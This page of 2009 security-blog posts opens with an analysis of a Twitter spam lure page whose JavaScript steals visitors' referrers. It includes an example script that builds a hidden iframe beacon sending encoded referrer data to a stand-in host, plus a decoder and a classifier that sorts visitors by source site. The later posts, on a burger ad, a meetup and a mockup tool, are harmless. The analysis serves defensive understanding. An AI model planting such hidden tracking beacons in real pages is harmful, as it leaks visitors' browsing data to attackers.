Tuesday 27 October 2009

Twitter, SPAM and zombie hookers

(screenshot: twitspim.png) Came out of the blue - no context, nothing... BTW - we've got a new URL shortening service.
All would be almost 'fine', but WTF is that? Not that I couldn't guess, but I'm just curious how owned you can get :-)

As a matter of fact, you can get owned pretty badly, and what I've seen I would expect to be just a starter... the main course is coming soon!

WARNING: All the information provided in this post is available on the Internet. Links shown in the screenshots should be considered malicious - do not visit them unless you really know what you are doing. You have been warned.

Just as your mother told you...

The best way, IMHO, to check stuff like that is the old-school way...

Looks broken, right? Redirect OK - that's what I expected, but then... hold on - the Client-Peer IP is not mine in any way... so who owns this one?

Isn't that just sweet? You go to a website and the traffic goes via a proxy somewhere in China. Well - that's not all, in fact. Let's grab a clean VM, make a snapshot just in case, connect - let's see what a sexy girl has to offer, right?


Don't do that at work or you may get strange looks from the people around you (at best) ;-)

The Bait

The page loads and looks like a blog - that's what the URL would suggest - but if you look at the source... I said THE SOURCE, not the boobs on the page!

Right... in the source you find the gems. First of all, the page uses the GeoIP JavaScript include from MaxMind - we all know it works well - to give the reader a more personalized experience while reading the story (don't even tell me you are still looking at the photos - lol). As a result the page resolves that I'm connecting from an IP address in London and that the poor girl comes from 'a small town near London , H9' and has to work as a stripper to pay her college fees...

London, H9... hold on - London doesn't have an H9 postcode (although on the page it looks like it was part of the address). The GeoIP information is used in several places and looks quite... convincing... as long as you focus on the boobies... oh, and forget about the fact that the bottom of the page says 'She is single boys!!!! She lives in my hometown of London' - right, somebody doesn't even have a spell checker :-]

The Shot

Let's look at the gems on the top shelf... I don't have a lot of time to look at it properly, so just some quick bullet points:

  1. We have a JavaScript file that contains two functions 'encoding' their input. Well, kind of encoding, because it uses ord() to do it and it seems the author is not very skilled, but anyway - he/she managed to produce working code.
  2. A call to the encode function with the referrer URL given as the parameter - why is someone trying to steal my referrer info?
  3. The JavaScript prints out an IFRAME linking to an HTML file and passes the encoded string as a GET parameter. The file came back empty, but the GET string is left in their logs :-)
Getting the referrer string doesn't look that bad... right? Anyway, why do they want to know where I am coming from? Is that like SEO and affiliate tracking for malware? Interesting!

Post Mortem

Not much of it... As I said, I don't have time to play with it properly and see if, for example, I actually get something from this 'empty' HTML file. It would be trivial to serve a further payload only when the victim supplies a properly encoded referrer string that is of interest to the attacker.
How effective would it be if the bad guys used this just to check through which channel the victim came to them (they can also find out which channels are the most successful - it's just like a marketing campaign)? The next logical step would be to serve a customized exploit - if the victim came from Twitter, do bad stuff to a Twitter user; from Facebook, get them owned on Facebook; etc.
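To make the three bullet points above and the 'customized exploit' speculation concrete, here is an added example - my own code, not the script found on the bait page, whose actual encoding, parameter name and file names are not reproduced on this page and are assumptions below. It shows an ord()-style 'encoder' of the kind described, the hidden IFRAME beacon it feeds (in a browser the input would be document.referrer), the decoder an analyst runs over the captured GET string, and a referrer-to-channel classifier of the kind the post speculates about:

```javascript
// Added example (not the script from the bait page): a model of the
// referrer-exfiltration beacon described in the post, the decoder for the
// captured GET string, and the channel classification the post speculates
// about. Encoding scheme, parameter name "r" and the beacon URL are ASSUMED;
// the real script's details are not reproduced on the page.

// 'Encoding' in the spirit of the ord()-based functions the post describes:
// every character becomes its zero-padded 3-digit character code. This is
// obfuscation, not encryption - anyone holding the log can reverse it.
function encodeReferrer(str) {
  let out = '';
  for (let i = 0; i < str.length; i++) {
    const code = str.charCodeAt(i);
    // HTTP Referer values are ASCII (non-ASCII is percent-encoded), so a
    // 3-digit code is enough; refuse anything else rather than corrupt it.
    if (code > 255) throw new Error('non-Latin-1 character in referrer');
    out += String(code).padStart(3, '0');
  }
  return out;
}

// Analyst side: reverse the encoding on a value pulled from the logs.
function decodeReferrer(encoded) {
  if (encoded.length % 3 !== 0 || !/^\d*$/.test(encoded)) {
    throw new Error('not an ord-encoded string');
  }
  let out = '';
  for (let i = 0; i < encoded.length; i += 3) {
    out += String.fromCharCode(Number(encoded.slice(i, i + 3)));
  }
  return out;
}

// What the bait page's script emits (via document.write in a browser, with
// document.referrer as the input): a hidden IFRAME whose src carries the
// encoded referrer, so it lands in the beacon server's access log even if
// the HTML file it points at is empty.
function buildBeaconIframe(referrer, beaconUrl) {
  return '<iframe src="' + beaconUrl + '?r=' + encodeReferrer(referrer) +
    '" width="1" height="1" style="display:none"></iframe>';
}

// Analyst side: recover the referrer from a captured request line
// (from your own proxy log, or from the attacker's logs if you ever get them).
function extractReferrerFromRequest(requestLine) {
  const m = /[?&]r=(\d+)/.exec(requestLine);
  return m ? decodeReferrer(m[1]) : null;
}

// The 'next logical step' from the post: bucket the victim by channel so a
// follow-up payload (or just the campaign statistics) can depend on it.
// The host lists are illustrative.
function classifyChannel(referrer) {
  const m = /^https?:\/\/([^\/?#]+)/i.exec(referrer || '');
  if (!m) return 'direct';
  const host = m[1].toLowerCase();
  if (host === 'twitter.com' || host.endsWith('.twitter.com')) return 'twitter';
  if (host === 'facebook.com' || host.endsWith('.facebook.com')) return 'facebook';
  return 'other';
}

// Constructed sample: the referrer a victim clicking the tweet would carry.
const sampleReferrer = 'http://twitter.com/home';
const beaconHtml = buildBeaconIframe(sampleReferrer, 'http://beacon.example/t.html');
const capturedRequest = 'GET /t.html?r=' + encodeReferrer(sampleReferrer) + ' HTTP/1.1';

console.log(beaconHtml);
console.log(extractReferrerFromRequest(capturedRequest)); // http://twitter.com/home
console.log(classifyChannel(extractReferrerFromRequest(capturedRequest))); // twitter
```

The point of the decoder is the one the post makes: a scheme like this hides nothing from anyone who holds the logs, so the 'empty' HTML file is best read as a tracking endpoint, and the referrer bucket is exactly what a server would need to decide which payload, if any, to hand back.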

Surely the guys are learning and their intentions are not good. Keep an eye out and don't get yourself fooled!

Friday 23 October 2009

Windows 7 Haz Cheezburgerz!


It came via e-mail from one of the 'marketing' guys, so I don't know the real origin (except the obvious one), but the sender's comment was spot on!

Look at the monster burger. It's five inches tall and of course is made with seven beef patties in honor of Windows 7. What's the message here? Eat this burger to feel as slow and bloated as Windows? I don't get it.

... and neither do I, but as a poster it's a nice one for a laugh. In fact Windows 7 is so much faster than Vista that there is nothing to compare ;-) so Burger King should have been selling V-shaped burgers back when Vista came out. Well - never mind... but thanks for this e-mail and a good laugh :-)

BTW, if there is anyone who understands what the advert is all about (and I don't mean translating the text) or can see the 'hidden message', please enlighten me :-)

Thursday 22 October 2009

RSA Security Bloggers Meet Up 2009 London

It's already a matter of the past, but still - the first official RSA Security Bloggers Meet Up 2009 in London was held at the Fountains Abbey at 19:30 on 20 October 2009. It was a great evening - meeting people who live and share every bit of security-related information they can - to educate and entertain :-)

I just want to say thank you to Dale Pearson of Security Active for getting all of it prepared, and to all the sponsors - IronKey, ISACA, Qualys, RSA and others - for helping Dale and sponsoring the meet up. Dale has posted a summary and photos from the meet up on Security Active's blog. If I've missed anybody above, please forgive me.

For me this meeting was a chance to see some people I'd already met earlier (like @stefant and several others) and some I had been trying to almost 'hunt down' in London for quite some time (@xme is a perfect example here), so the meet up was a real success :-)

Thanks again and see you all next time!

Saturday 17 October 2009

UI mockups - nice and easy

I write code. Sometimes it will be a short script, sometimes a web app; the next day it can be something with a more traditional user interface. But designing user interfaces is my worst nightmare. I can plan the whole app, write and test the code, but when it comes to UI design I just want to run away - it is simply not my game.

Usually when everything is finally ready (or so I think) somebody comes and says 'Oh! By the way - if you moved this part here, it would be better - easier to use', and quite often they are right. So I've started asking my potential users how they want it done before I actually create it at all, but for that I need simple drawings that explain my idea - something they can look at and say whether they like it or not. Preparing several sketches takes time, modifying them takes even more... but there is a tool that helps.

A humble screen shot is worth more than a thousand words...

As simple as that - a prototype of a simple blog layout in less than 10 minutes using Balsamiq Mockups for Desktop (demo version). Simple, nice to use, very effective!

Normally I wouldn't write about 'software' (especially commercial), but there is something special about this one...

First of all, the main use of this program is to do mockups of user interfaces - be it web apps (which for me are yet another form of UI), iPhone apps, dialog windows or anything else. Sometimes all you really need is a simple wireframe to show what will be where - a rough cut to present the idea - and using pen and paper is simply too... boring and ineffective, especially when you want to discuss your ideas, then possibly change them a bit and discuss again. This is where Balsamiq Mockups for Desktop comes in.

Mockups for Desktop runs as an Adobe AIR application, so it's cross-platform. The interface is very intuitive and easy to work with, so you can't get it wrong. You can get your first mockups ready literally minutes after you start the application for the first time ever - modeling my other blog layout idea took me just 3 minutes. It is very simple - just drag the element from the UI library to the main drawing area and put it in the right place. Editing objects comes naturally - I guess even a child could do it :-)

I won't be telling you how to use it - go figure it out yourself and have fun as I did :-) Wow! I think that was the first time ever I had a smile on my face when working on the user interface side of things. I think it's a really good piece of software, and an honest 'well done' to the guys at Balsamiq.

BTW. Irek, thanks for bringing it to my attention ;-)